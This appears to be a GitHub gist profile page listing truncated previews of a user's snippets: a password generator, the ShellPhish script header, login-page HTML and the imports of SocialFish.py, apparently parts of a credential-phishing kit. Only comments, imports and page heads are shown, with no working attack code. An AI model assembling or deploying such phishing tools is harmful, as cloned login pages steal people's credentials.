Skip to content

Instantly share code, notes, and snippets.

View yougie's full-sized avatar
💭
Standar

Kemidin yougie

💭
Standar
View GitHub Profile
@yougie
yougie / Passgen
Created March 17, 2019 17:10
Pasgenmujeb,🛄
import random
import sys
from math import log
if sys.version_info < (3, 0):
input = raw_input
# Just some colors and shit
white = '\033[1;97m'
green = '\033[1;32m'
@yougie
yougie / shellphish.sh
Last active August 26, 2019 02:01
Thelinuxchoice/shellphish.sh
#!/bin/bash
# ShellPhish v1.7.1
# Coded by: kemidiin (You dont become a coder by just changing the credits)
# Github: https://github.com/kemidiin/shellphish
# This script uses some Phishing Pages generated by SocialFish tool (UndeadSec) (https://github.com/UndeadSec/SocialFish)
# Instagram Phishing Page generated by K3midi3n (https://github.com/K3midi3n)
trap 'printf "\n";stop;exit 1' 2
@yougie
yougie / Password2
Created March 17, 2019 16:45
Kemidinpash2
<html lang="en-Us">
<head>
<meta charset="utf-8">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="/vendor/bootstrap-4.1/bootstrap.min.css" rel="stylesheet" media="all">
<style>
@yougie
yougie / Password
Created March 17, 2019 16:43
Kemidinpash
<!DOCTYPE html>
<html>
<head>
<!-- Required meta tags-->
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="SocialFish">
<meta name="author" content="UndeadSec">
<meta name="keywords" content="SocialFish">
@yougie
yougie / SocialFish.py
Created March 17, 2019 16:40
Kemidinfish
#!/usr/bin/env python3
from flask import Flask, request, render_template, jsonify, redirect, g, flash
from core.config import *
from core.view import head
from core.scansf import nScan
from core.clonesf import clone
from core.dbsf import initDB
from core.genToken import genToken, genQRCode
from core.sendMail import sendMail
from core.tracegeoIp import tracegeoIp